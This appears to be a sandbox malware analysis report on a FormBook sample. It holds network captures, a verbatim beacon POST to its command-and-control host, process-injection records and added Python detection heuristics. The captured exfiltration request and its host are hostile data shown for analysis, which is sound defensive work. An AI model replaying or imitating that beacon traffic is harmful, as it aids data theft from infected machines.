                                                  Data Raw: 32 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 [TRUNCATED]
                                                  Data Ascii: 200<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64, [TRUNCATED]
                                                  Jan 10, 2025 20:11:51.267761946 CET | 1236 | IN | Data Raw: 58 66 50 4e 75 47 64 62 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c
                                                  Data Ascii: XfPNuGdbiJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4iE02PyxAS39N
                                                  Jan 10, 2025 20:11:51.267777920 CET | 448 | IN | Data Raw: 65 36 39 39 73 45 4b 6a 47 59 32 67 4d 49 39 55 4c 67 58 34 57 67 75 31 44 75 55 63 79 39 51 6f 45 75 4d 76 71 36 31 70 79 48 67 2b 4a 38 50 6e 6b 45 35 66 52 48 73 54 31 39 44 38 46 45 4f 42 39 77 66 68 39 53 47 7a 5a 42 43 64 31 4d 61 37 6a 48
                                                  Data Ascii: e699sEKjGY2gMI9ULgX4Wgu1DuUcy9QoEuMvq61pyHg+J8PnkE5fRHsT19D8FEOB9wfh9SGzZBCd1Ma7jHKVYLZIZAsc+xDpOnLDj7xxZvrnHjUdOAdw6220zP9tWP3YucRRtabeV3Setztm+WNOWBmoLt2/tBOlb0uzZT2RZeWD+meWbaPOW9+GNrAeY+JjcDDfP8fAYe5cVFu/02q26h1KksDy45nbxTNgtVHK+YGydm0+mjY
                                                  Jan 10, 2025 20:11:51.267796993 CET | 1236 | IN | Data Raw: 4d 38 51 59 6c 78 48 64 43 38 56 45 6d 31 56 7a 4a 35 46 49 73 67 66 66 52 30 75 4d 55 31 4b 31 4e 42 41 4b 4e 49 79 73 33 37 58 62 79 71 64 79 39 62 61 56 4d 4a 44 71 63 62 47 35 74 79 53 56 5a 73 5a 63 46 44 33 54 69 57 58 32 50 35 4b 71 43 53
                                                  Data Ascii: M8QYlxHdC8VEm1VzJ5FIsgffR0uMU1K1NBAKNIys37Xbyqdy9baVMJDqcbG5tySVZsZcFD3TiWX2P5KqCS/lnWaY6Y8u2/OLa181I//Q42NP3LXzq3Py82/g7sVWb73XzD+9qeRvi3uPmo2E7UTN39l/c/vnS9f4509N/A8B8Sp4dDZbzB3ORT/nQfsKPo+5M/4Drl+2uAmCHNc8PFrhPu8tF4Nbh5c2ncsUjH/KlPrl8PdmVdM
                                                  Jan 10, 2025 20:11:51.267862082 CET | 1236 | IN | Data Raw: 41 57 6c 6c 4c 74 6e 4c 62 6b 4b 57 4d 49 54 78 79 49 53 39 45 46 4f 48 55 36 75 68 36 67 64 61 62 41 50 76 61 72 53 33 45 78 43 6d 6c 30 43 39 42 79 31 78 76 72 50 6f 37 4e 7a 51 56 47 71 44 35 33 77 71 62 70 31 7a 6e 68 43 2b 74 2f 62 46 67 33
                                                  Data Ascii: AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C9By1xvrPo7NzQVGqD53wqbp1znhC+t/bFg3qhva6BbojXb/vVSSp4SJC3HSTZ78jQQA5F9NwArbx4yTtgBXfPNuGdbiJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4a
                                                  Jan 10, 2025 20:11:51.267879009 CET | 1236 | IN | Data Raw: 64 62 44 72 2b 58 6b 6e 4b 69 33 4f 7a 4a 55 32 35 70 49 38 43 65 62 4b 52 6a 47 37 37 78 54 7a 7a 4b 46 4c 38 54 73 33 37 41 62 6e 4f 73 59 31 31 46 73 48 37 4d 79 4c 4d 64 37 63 36 4e 4a 31 4c 4e 64 63 37 6d 71 61 30 59 77 6e 30 59 6f 62 4f 63
                                                  Data Ascii: dbDr+XknKi3OzJU25pI8CebKRjG77xTzzKFL8Ts37AbnOsY11FsH7MyLMd7c6NJ1LNdc7mqa0Ywn0YobOc9y2Z/nh8z9UHnAeejTZucry9swpghar8rGUuj7MGKdktkKse699sEKjGY2gMI9ULgX4Wgu1DuUcy9QoEuMvq61pyHg+J8PnkE5fRHsT19D8FEOB9wfh9SGzZBCd1Ma7jHKVYLZIZAsc+xDpOnLDj7xxZvrnHjUdOA
                                                  Jan 10, 2025 20:11:51.267895937 CET | 1236 | IN | Data Raw: 61 73 65 36 34 2c 41 41 41 42 41 41 45 41 45 42 41 41 41 41 45 41 49 41 42 6f 42 41 41 41 46 67 41 41 41 43 67 41 41 41 41 51 41 41 41 41 49 41 41 41 41 41 45 41 49 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                  Data Ascii: ase64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGCDAB1jkQ6hY5ALwGGLCkkAAAABAAAAAAAAAAAAAAAAY5AORWOQDL5jkAykX4cAIAAAAAAAAAAAAAAAAAAAAABlkQuZaZYQ/2iVEP9mkw76ZJAOi39/AAIAAAABY5ELhWaTDvlolRD/aZcQ/
                                                  Jan 10, 2025 20:11:51.267911911 CET | 1236 | IN | Data Raw: 53 50 45 50 39 6b 6a 78 44 2f 5a 49 38 51 2f 32 61 54 45 66 39 6d 6b 67 37 77 59 49 67 4c 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 6d 6b 77 78 56 5a 5a 41 4f 34 32 65 54
                                                  Data Ascii: SPEP9kjxD/ZI8Q/2aTEf9mkg7wYIgLLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABmkwxVZZAO42eTEf9mkg//ZpEP/2eUEf9mkhDkY40FWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGCDAB1jjwxpY44MyGOPDMtikAxqXYgRHgAAAAAAAAAAAAAAAAAAAAAAAAAA5+cAAMGDAADxjwAA+B8AAMADA
                                                  Jan 10, 2025 20:11:51.267929077 CET | 1236 | IN | Data Raw: 4e 65 74 76 65 33 68 47 48 4c 64 55 38 37 32 37 76 38 76 35 72 47 78 65 58 62 68 67 4d 4f 4d 62 53 59 77 67 51 6b 77 49 47 41 51 30 41 51 70 74 30 53 72 75 39 56 71 68 52 61 53 48 49 6a 58 33 37 44 33 57 76 67 68 68 41 44 43 2b 41 6b 7a 36 36 62
                                                  Data Ascii: Netve3hGHLdU8727v8v5rGxeXbhgMOMbSYwgQkwIGAQ0AQpt0Sru9VqhRaSHIjX37D3WvghhADC+Akz66b2f+/U/o7tLMy1No8LyAE8KVFmNLJlR3WdjdqqZZ/j7vqB3P5J2z+mYIE2dpLyUgAFD4A+31NpuR/tJc3/BpRBSpzajq23Rjo0mv91at9NuOey3ajptsitpUBqcUnpMsigIJAfCBN73LJdpisBoNC2NvDQSfkgJPE3
                                                  Jan 10, 2025 20:11:51.267947912 CET | 1236 | IN | Data Raw: 6c 4c 72 6e 4e 59 65 62 34 56 66 41 50 71 74 6f 44 42 32 48 71 31 32 62 4b 2f 4c 74 65 61 55 57 6a 55 7a 6b 72 79 72 74 61 38 56 2f 39 53 47 45 6e 59 76 38 4f 50 51 55 42 36 49 47 69 48 68 65 66 4b 6d 2b 37 43 37 4a 78 4d 59 59 49 35 62 6c 4f 55
                                                  Data Ascii: lLrnNYeb4VfAPqtoDB2Hq12bK/LteaUWjUzkryrta8V/9SGEnYv8OPQUB6IGiHhefKm+7C7JxMYYI5blOUj66IuwFSC///2vrPv3p3SaF0hJMJFSiTc+ZO31pz0oRZVumx9iEJiLHFYlG1OdCGrRBmEUcD//99reva596W8Tz9IwRAHqHaKDWhpQBVplg/BCAyB7cDGsOuVp0Wa2K4C9uDfdiD/4bfpwGyjbtRlAVuiRQL//5yv
                                                  Jan 10, 2025 20:11:51.273885965 CET | 1236 | IN | Data Raw: 70 47 57 6a 4b 79 63 76 49 4c 31 74 46 48 62 6c 68 31 37 58 35 77 76 55 58 76 6a 5a 6e 38 67 46 71 72 32 74 77 72 44 5a 6f 72 4f 72 6d 6b 48 73 59 4b 42 51 47 46 77 52 4b 48 68 57 4e 49 53 30 6f 6f 31 47 37 62 73 6c 44 31 4b 35 56 56 38 30 6f 31
                                                  Data Ascii: pGWjKycvIL1tFHblh17X5wvUXvjZn8gFqr2twrDZorOrmkHsYKBQGFwRKHhWNIS0oo1G7bslD1K5VV80o1KxWk4j+ZYZLNaGW0lhVWXSqMzmCw2h8sTCEViycf6d5C9WFNYBZIBioEf/Wtsj3lxi8LzExRVRa3UR+KpvpsUAfUYmCa4PnaArJmDqIbiFI5IJ0+XdJdeDJfgU/pwD0fC/usmPrdHvBMSkZKRU9RBz9KLGBiZmFlY
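The POST above is what the sample sends to its command-and-control host: a form-encoded body consisting of one key (rdmhfXe) whose value is raw base64, a Referer that is simply the POST URL itself, Origin and Referer over cleartext HTTP, and a fixed Chrome 43 user agent. The reply is a hosting provider's "Website not found" 404, so the domain resolved to 63.250.43.134 but nothing was serving the FormBook panel when the sample ran. The script below is an added example and not part of the Joe Sandbox report: OBSERVED_BEACON is the captured request copied verbatim from this page, while BENIGN_FORM_POST, the Chrome-version cut-off, the short-path pattern and the score threshold are constructed assumptions used to show how the indicators separate a bot beacon from a real browser form submission.

```python
"""Heuristic triage of the HTTP POST captured in session 14.

Added example, not part of the Joe Sandbox report. OBSERVED_BEACON is the
request copied verbatim from the capture above. BENIGN_FORM_POST, the Chrome
version cut-off, the short-path pattern and the score threshold are
constructed assumptions for illustration.
"""
import base64
import binascii
import re

# Request observed in the sandbox capture (headers and body verbatim).
OBSERVED_BEACON = (
    "POST /4inx/ HTTP/1.1\r\n"
    "Host: www.oneeyetrousersnake.xyz\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Content-Length: 220\r\n"
    "Cache-Control: max-age=0\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Origin: http://www.oneeyetrousersnake.xyz\r\n"
    "Referer: http://www.oneeyetrousersnake.xyz/4inx/\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36\r\n"
    "\r\n"
    "rdmhfXe=hB7jiLqDgxzBTzS3jLn8IR4kpGw8uHwhntBQnZeG5weAZE3yacPlsymWvguEbSWbEq+sIkNTpueosgD9PYPfiKlnItA7jbxA2COwmarBGrhS2Sc1MNZD2lh/Lzck4QLHN2iAvFlimc/uMNRtLcpKGMdl1/WnLnEIw+e4pI1dOSJEiw9ZhrBQIc9BewHWMsvH3olDFDdYf3ZgoL+4rw=="
)

# Constructed benign form submission for comparison (not from the report).
BENIGN_FORM_POST = (
    "POST /login HTTP/1.1\r\n"
    "Host: intranet.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 38\r\n"
    "Origin: https://intranet.example.test\r\n"
    "Referer: https://intranet.example.test/login?next=%2Fhome\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36\r\n"
    "\r\n"
    "user=alice&password=Winter2025%21&rm=1"
)

CHROME_MAJOR = re.compile(r"Chrome/(\d+)\.")
BASE64_TEXT = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SHORT_DIR_PATH = re.compile(r"^/[A-Za-z0-9]{2,8}/$")  # assumption generalising the observed /4inx/
STALE_CHROME_MAJOR = 100  # assumption: anything older is a hard-coded UA, not a 2025 browser
BEACON_THRESHOLD = 5      # assumption: indicators needed before calling it a beacon


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.1 request parser: request line, lower-cased headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def score_beacon(raw: str) -> dict:
    """Apply the indicators visible in the captured POST and count how many fire."""
    req = parse_request(raw)
    h, body = req["headers"], req["body"]
    pairs = body.split("&") if body else []
    single = len(pairs) == 1 and "=" in pairs[0]
    value = pairs[0].partition("=")[2] if single else ""
    decoded_len = None
    if single and BASE64_TEXT.match(value) and len(value) % 4 == 0:
        try:
            decoded_len = len(base64.b64decode(value, validate=True))
        except binascii.Error:
            decoded_len = None
    origin, referer = h.get("origin", ""), h.get("referer", "")
    chrome = CHROME_MAJOR.search(h.get("user-agent", ""))
    hits = {
        "post_form_urlencoded": req["method"] == "POST"
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded"),
        "single_key_value_body": single,
        "value_is_raw_base64": decoded_len is not None,
        # A browser's form encoder percent-encodes '/' and '=' inside a value
        # (%2F, %3D); their literal presence means code wrote this body.
        "value_not_form_escaped": bool(re.search(r"[/=]", value)),
        "referer_equals_post_url": bool(origin) and referer == origin + req["path"],
        "cleartext_http": origin.startswith("http://"),
        "stale_chrome_ua": bool(chrome) and int(chrome.group(1)) < STALE_CHROME_MAJOR,
        "short_directory_path": bool(SHORT_DIR_PATH.match(req["path"])),
    }
    declared = h.get("content-length")
    return {
        "host": h.get("host", ""),
        "hits": hits,
        "score": sum(hits.values()),
        "decoded_len": decoded_len,
        "content_length_ok": declared is not None and int(declared) == len(body.encode()),
    }


def is_likely_beacon(raw: str, threshold: int = BEACON_THRESHOLD) -> bool:
    return score_beacon(raw)["score"] >= threshold


if __name__ == "__main__":
    for label, raw in (("observed", OBSERVED_BEACON), ("benign", BENIGN_FORM_POST)):
        result = score_beacon(raw)
        fired = [k for k, v in result["hits"].items() if v]
        print(f"{label}: {result['host']} score={result['score']} "
              f"decoded={result['decoded_len']} hits={fired}")
```

Run as-is, the observed request scores 8 of 8 indicators and the constructed login form scores 1 (it is a form-encoded POST and nothing else). The body checks carry the most weight on their own: the 212-character value decodes to 157 bytes of binary, and it contains literal '/' and '=' that no browser form encoder would emit unescaped. The Referer and Origin checks only matter in combination, since a real page at /4inx/ posting a form to itself would produce the same headers.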


                                                  Target ID:0
                                                  Start time:14:09:43
                                                  Start date:10/01/2025
                                                  Path:C:\Users\user\Desktop\wWXR5js3k2.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\wWXR5js3k2.exe"
                                                  Imagebase:0x650000
                                                  File size:1'326'080 bytes
                                                  MD5 hash:9D8150F9B27A2A93925717D361ADD951
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:14:09:44
                                                  Start date:10/01/2025
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\wWXR5js3k2.exe"
                                                  Imagebase:0x3d0000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1886979901.0000000003390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:14:10:28
                                                  Start date:10/01/2025
                                                  Path:C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe"
                                                  Imagebase:0x410000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:5
                                                  Start time:14:10:29
                                                  Start date:10/01/2025
                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\powercfg.exe"
                                                  Imagebase:0x730000
                                                  File size:78'336 bytes
                                                  MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2610818121.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:14:10:43
                                                  Start date:10/01/2025
                                                  Path:C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe"
                                                  Imagebase:0x410000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2615837301.0000000005650000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:10
                                                  Start time:14:10:55
                                                  Start date:10/01/2025
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff73feb0000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true
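Two things in the process list above deserve a closer look. Target 2 is C:\Windows\SysWOW64\svchost.exe, yet its command line is the sample's own path on the Desktop and three of its memory regions match the FormBook YARA rule: the image on disk and the code that runs in it are not the same program. Target 5 is powercfg.exe started with no arguments at all and likewise carrying FormBook code in memory, and Targets 4 and 8 run the same dropped binary from a long, random-looking directory under Program Files (x86). The script below is an added example and not part of the Joe Sandbox report. Its PROCESSES records are copied from the Target entries on this page; the thresholds in looks_random (name length and case-switch ratio) are assumptions chosen for illustration, and the heuristics themselves are the ones a practitioner would run over process-creation telemetry to catch this pattern.

```python
"""Heuristic triage of the process list in this sandbox report.

Added example, not part of the Joe Sandbox report itself. PROCESSES is
copied from the Target entries on this page; the looks_random thresholds
(directory-name length and case-switch ratio) are assumptions.
"""
import ntpath

# (target id, image path on disk, command line, FormBook YARA match in memory)
PROCESSES = [
    (0, r"C:\Users\user\Desktop\wWXR5js3k2.exe",
        r'"C:\Users\user\Desktop\wWXR5js3k2.exe"', False),
    (2, r"C:\Windows\SysWOW64\svchost.exe",
        r'"C:\Users\user\Desktop\wWXR5js3k2.exe"', True),
    (4, r"C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe",
        r'"C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe"', True),
    (5, r"C:\Windows\SysWOW64\powercfg.exe",
        r'"C:\Windows\SysWOW64\powercfg.exe"', True),
    (8, r"C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe",
        r'"C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe"', True),
    (10, r"C:\Program Files\Mozilla Firefox\firefox.exe",
        r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', False),
]

WINDOWS_DIR = "c:\\windows\\"
PROGRAM_FILES = ("c:\\program files\\", "c:\\program files (x86)\\")


def first_token(cmdline: str):
    """Split a Windows command line into (executable, remaining arguments)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end], s[end + 1:].strip()
    exe, _, rest = s.partition(" ")
    return exe, rest.strip()


def case_switch_ratio(name: str) -> float:
    """Fraction of adjacent letter pairs that flip between upper and lower case.

    Machine-generated mixed-case names flip often; vendor names such as
    "Mozilla Firefox" flip only at word boundaries.
    """
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 2:
        return 0.0
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return flips / (len(letters) - 1)


def looks_random(name: str, min_len: int = 24, min_ratio: float = 0.25) -> bool:
    """Assumed thresholds: long, letters only, frequent case flips."""
    return len(name) >= min_len and name.isalpha() and case_switch_ratio(name) >= min_ratio


def triage(proc):
    """Return (target id, list of indicator names) for one process record."""
    tid, image, cmdline, yara = proc
    exe, args = first_token(cmdline)
    low = image.lower()
    findings = []
    # The binary on disk is not the program named on the command line: the
    # process was created from one image and made to run another.
    if ntpath.basename(exe).lower() != ntpath.basename(image).lower():
        findings.append("image_cmdline_mismatch")
    # A Microsoft binary under C:\Windows whose memory matches a malware rule.
    if low.startswith(WINDOWS_DIR) and yara:
        findings.append("windows_binary_with_payload_in_memory")
    # svchost.exe and powercfg.exe have no legitimate use without arguments.
    if low.startswith(WINDOWS_DIR) and not args:
        findings.append("system_utility_without_arguments")
    # Vendor directory under Program Files that looks machine-generated.
    vendor_dir = ntpath.basename(ntpath.dirname(image))
    if low.startswith(PROGRAM_FILES) and looks_random(vendor_dir):
        findings.append("random_program_files_dir")
    return tid, findings


def triage_all(processes=PROCESSES) -> dict:
    """Map every target id to its list of indicators."""
    return dict(triage(p) for p in processes)


if __name__ == "__main__":
    for tid, findings in triage_all().items():
        print(f"Target {tid}: {', '.join(findings) or 'no findings'}")
```

Against the records on this page the dropper (Target 0) and Firefox (Target 10) produce no findings, svchost.exe trips all three Windows-binary indicators, powercfg.exe trips two, and both instances of the dropped executable are flagged only for their directory name. In live telemetry the image/command-line mismatch is the cheapest of these to evaluate and the hardest for an injector to avoid, because the command line it hands to CreateProcess is what the hollowed child reports.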


                                                    Execution Graph

                                                    Execution Coverage:3.9%
                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                    Signature Coverage:3.3%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:170
                                                    [Execution graph data omitted: this block is the serialized node and edge list behind the interactive graph viewer and is not readable as text. API calls that appear on the graph include the C runtime start-up sequence (GetStartupInfoW, GetCommandLineW, GetEnvironmentStringsW, GetModuleFileNameW, SetUnhandledExceptionFilter, IsProcessorFeaturePresent), registry reads (RegOpenKeyExW, RegQueryValueExW, RegCloseKey), GUI and environment set-up (IsThemeActive, SystemParametersInfoW, GetSysColorBrush, LoadCursorW, LoadIconW, GetCurrentDirectoryW, GetFullPathNameW, SetCurrentDirectoryW), an administrator-group check via AllocateAndInitializeSid, CheckTokenMembership and FreeSid, and an IsDebuggerPresent check one branch of which leads to MessageBoxA.]
_W_store_winword 60 API calls 101523->101524 101525 6538c6 101524->101525 101525->101510 101526 653907 101525->101526 101528 653ed0 59 API calls 101525->101528 101526->101510 101527 653914 101526->101527 101775 6592ce 101527->101775 101529 6538ea 101528->101529 101531 658047 59 API calls 101529->101531 101533 6538f8 101531->101533 101535 653ed0 59 API calls 101533->101535 101535->101526 101538 65928a 59 API calls 101540 65394f 101538->101540 101539 658ee0 60 API calls 101539->101540 101540->101538 101540->101539 101541 653ed0 59 API calls 101540->101541 101542 653995 Mailbox 101540->101542 101541->101540 101542->101412 101544 657292 __write_nolock 101543->101544 101545 68ea22 _memset 101544->101545 101546 6572ab 101544->101546 101549 68ea3e GetOpenFileNameW 101545->101549 102590 654750 101546->102590 101551 68ea8d 101549->101551 101552 657bcc 59 API calls 101551->101552 101554 68eaa2 101552->101554 101554->101554 101556 6572c9 102618 65686a 101556->102618 101560 657c45 101559->101560 101562 657bd8 __wsetenvp 101559->101562 101561 657d2c 59 API calls 101560->101561 101567 657bf6 _memmove 101561->101567 101563 657c13 101562->101563 101564 657bee 101562->101564 101565 658029 59 API calls 101563->101565 102955 657f27 59 API calls Mailbox 101564->102955 101565->101567 101567->101425 101569 66093a __write_nolock 101568->101569 102956 656d80 101569->102956 101571 66093f 101583 653c14 101571->101583 102967 66119e 89 API calls 101571->102967 101573 66094c 101573->101583 102968 663ee7 91 API calls Mailbox 101573->102968 101575 660955 101576 660959 GetFullPathNameW 101575->101576 101575->101583 101577 657bcc 59 API calls 101576->101577 101578 660985 101577->101578 101579 657bcc 59 API calls 101578->101579 101580 660992 101579->101580 101581 694cab _wcscat 101580->101581 101582 657bcc 59 API calls 101580->101582 101582->101583 101583->101421 101583->101429 101585 653ab0 LoadImageW RegisterClassExW 101584->101585 101586 68d261 101584->101586 103006 653041 7 API calls 
